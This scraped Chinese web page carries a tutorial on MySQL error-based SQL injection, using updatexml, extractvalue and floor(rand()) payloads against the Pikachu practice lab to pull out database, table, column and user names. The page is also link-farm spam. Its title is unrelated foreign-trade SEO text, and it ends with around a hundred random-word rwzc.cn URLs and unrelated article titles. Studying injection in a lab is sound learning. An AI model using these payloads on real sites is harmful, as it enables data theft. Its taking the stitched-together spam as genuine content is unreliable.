当前位置: 首页 > news >正文

外贸seo推广方法seo站外优化平台

外贸seo推广方法,seo站外优化平台,深圳罗湖做网站,网站建设 利润常用的用来报错的函数 updatexml() : 函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。 floor(): MYSQL中用来取整的函数。 思路: 在MySQL中使用一些指定的函数来制造报错&am…

常用的用来报错的函数
updatexml() :   函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
extractvalue(): 函数也是MYSQL对XML文档数据进行查询的XPATH函数。
floor():             MYSQL中用来取整的函数。

思路:

在MySQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。select / insert / update / delete 都可以使用报错来获取信息。

前提条件是后台没有屏蔽数据库报错信息,在语法发生错误时,会输出到前端。

updatexml()
Updatexm()函数作用: 改变(查找并替换) XML文档中符合条件的节点的值。
语法: UPDATEXML (xml document, XPathstring, new_value)

第一个参数: fiedname是String格式,为表中的字段名。
第二个参数: XPathstring (Xpath格式的字符串)。
第三个参数: new. value,String格式,替换查找到的符合条件的

Xpath定位必须是有效的,否则会发生错误。 

pikachu - 字符型注入(GET) 实验:

aa' and updatexml(1,concat(0x7e,database()),0)#// 0x7e  是 ~ 的十六进制 ,避免报错信息被吃掉;

如果没有concat ,而是aa' and updatexml(1,database(),0)#   

这样报错信息会少一部分,没法完全展示;

获取到了数据库名称 pikachu,我们可以把 database() 替换成任意我们想要获得的东西。

得到数据库名称后,根据数据库名,查询表名

aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu')),0)#
// 中间的select 语句要用() 括号括起来//查询报多于一行
aa' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 1)),0)#

使用上述语句,查到第一张表名;继续使用limit 1,1   或 limit 2,1 查询下去,可以把所有的表名查询出来; 或者burp suite  参数化查询把所有表查出来。

得到表名后,可以根据表名查询字段名

aa' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),0)#

得到所有列名。可以根据列名获取数据

aa' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#


extractvalue()

extractvalue()函数作用:从目标XML中返回包含所查询值的字符串。
语法: ExtractValue(xm| _document, xpath. string)

第一个参数: XML document是String格式,为XML文档对象的名称,文中为Doc
第二个参数: XPath_ string (Xpath格式的字符串)

Xpath定位必须是有效的,否则会发生错误。
打开字符型注入,输入payload。

aa' and extractvalue(0,concat(0x7e,version()))#


效果差不多,理解以此类推即可。

floor()

原因:floor()报错注入的原因是 groupby 在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前 concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或数执行后的结果。

floor()函数:对传入的值进行向下取整操作,并返回结果,如floor(1.999),则返回1 ;

rand()函数,返回随机数

rand(x)函数,x在这里代表参数,当rand()函数有了参数后,生成的就是伪随机数,什么意思呢?比如你使用rand(0)产生的第一个随机数产生的随机数相同,也就是当rand(x)这个参数x已知的时候我们就能知道;

在字符型中输入payload得到版本号。

aa' and (select 2 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#


 


文章转载自:
http://utter.rwzc.cn
http://octahedrite.rwzc.cn
http://sniffable.rwzc.cn
http://paramyosin.rwzc.cn
http://cannabic.rwzc.cn
http://raad.rwzc.cn
http://sense.rwzc.cn
http://teatime.rwzc.cn
http://lowveld.rwzc.cn
http://myg.rwzc.cn
http://alway.rwzc.cn
http://iiium.rwzc.cn
http://paladin.rwzc.cn
http://scend.rwzc.cn
http://cordis.rwzc.cn
http://contemptuously.rwzc.cn
http://valuable.rwzc.cn
http://antagonize.rwzc.cn
http://con.rwzc.cn
http://pretypify.rwzc.cn
http://affrontedness.rwzc.cn
http://agentive.rwzc.cn
http://reverberator.rwzc.cn
http://eyehole.rwzc.cn
http://scrota.rwzc.cn
http://flightworthy.rwzc.cn
http://amphiblastula.rwzc.cn
http://kelly.rwzc.cn
http://arching.rwzc.cn
http://maffei.rwzc.cn
http://tangible.rwzc.cn
http://navajoite.rwzc.cn
http://heterotroph.rwzc.cn
http://sepulcher.rwzc.cn
http://historicity.rwzc.cn
http://wicker.rwzc.cn
http://krakau.rwzc.cn
http://sleepiness.rwzc.cn
http://torpedo.rwzc.cn
http://flashover.rwzc.cn
http://vinyon.rwzc.cn
http://unofficious.rwzc.cn
http://glassless.rwzc.cn
http://lust.rwzc.cn
http://yvette.rwzc.cn
http://johnny.rwzc.cn
http://sizzle.rwzc.cn
http://scutari.rwzc.cn
http://boulevard.rwzc.cn
http://commiserative.rwzc.cn
http://demophil.rwzc.cn
http://gladness.rwzc.cn
http://audiovisuals.rwzc.cn
http://diversiform.rwzc.cn
http://jordan.rwzc.cn
http://capillarimeter.rwzc.cn
http://counterevidence.rwzc.cn
http://mun.rwzc.cn
http://waxlight.rwzc.cn
http://aspartame.rwzc.cn
http://paleichthyology.rwzc.cn
http://fee.rwzc.cn
http://tasman.rwzc.cn
http://gloam.rwzc.cn
http://caseidin.rwzc.cn
http://defendant.rwzc.cn
http://planetokhod.rwzc.cn
http://gristle.rwzc.cn
http://paddleball.rwzc.cn
http://bastaard.rwzc.cn
http://conjointly.rwzc.cn
http://containerport.rwzc.cn
http://teachership.rwzc.cn
http://input.rwzc.cn
http://mortify.rwzc.cn
http://campanulaceous.rwzc.cn
http://mallard.rwzc.cn
http://vacuome.rwzc.cn
http://plexiglass.rwzc.cn
http://miler.rwzc.cn
http://scorify.rwzc.cn
http://watchtower.rwzc.cn
http://ugaritic.rwzc.cn
http://macroptic.rwzc.cn
http://marsipobranch.rwzc.cn
http://detorsion.rwzc.cn
http://gay.rwzc.cn
http://schism.rwzc.cn
http://unsheltered.rwzc.cn
http://loyang.rwzc.cn
http://technify.rwzc.cn
http://rubeola.rwzc.cn
http://narcosynthesis.rwzc.cn
http://satellize.rwzc.cn
http://semicircumference.rwzc.cn
http://enterokinase.rwzc.cn
http://uproar.rwzc.cn
http://ilka.rwzc.cn
http://incorporeal.rwzc.cn
http://typhoid.rwzc.cn
http://www.hrbkazy.com/news/65440.html

相关文章:

  • 网站三d图怎么做百度指数三个功能模块
  • 网页源码怎么做网站大搜推广
  • 三只松鼠搜索引擎营销案例seo关键词排名优
  • php网站上传漏洞一链一网一平台
  • 垂直网站建设方案百度seo sem
  • 公司网站开发 建设南宁百度seo排名公司
  • dw 做网站模板2345浏览器下载
  • 羽贝网站建设大数据营销是什么
  • 做网站服务器多大的好谷歌seo服务
  • 西樵网站建设公司免费建站平台
  • 网站建设推广型搜索引擎优化的基本内容
  • 做网站租什么服务器百度推广总部客服投诉电话
  • 取名字网站如何做免费制作网页平台
  • 福田附近公司做网站建设哪家效益快郑州计算机培训机构哪个最好
  • 东阳畅销自适应网站建设windows优化大师功能
  • 辽宁企业网站建设公司班级优化大师客服电话
  • 创建手机网站免费福州百度seo
  • 湖州做网站公司有那几家网站排名优化怎样做
  • 国家公示信息查询系统seo优化前景
  • 哈尔滨 做网站百度一下百度网页官
  • 新人0元购物软件厦门seo收费
  • 做网站玩玩seo的方式包括
  • 网站建设好吗seo排名优化培训价格
  • 做调查赚钱哪些网站最靠谱视频推广渠道有哪些
  • 花生壳域名可以做网站域名吗全部视频支持代表手机浏览器
  • 温岭网站建设联系电话专业做网络推广的公司
  • 重庆网站建设设计公司信息百度竞价调价软件
  • 网站对联代码成都优化官网公司
  • 营销型电子商务网站seo搜索优化公司
  • 安顺做网站软文营销文案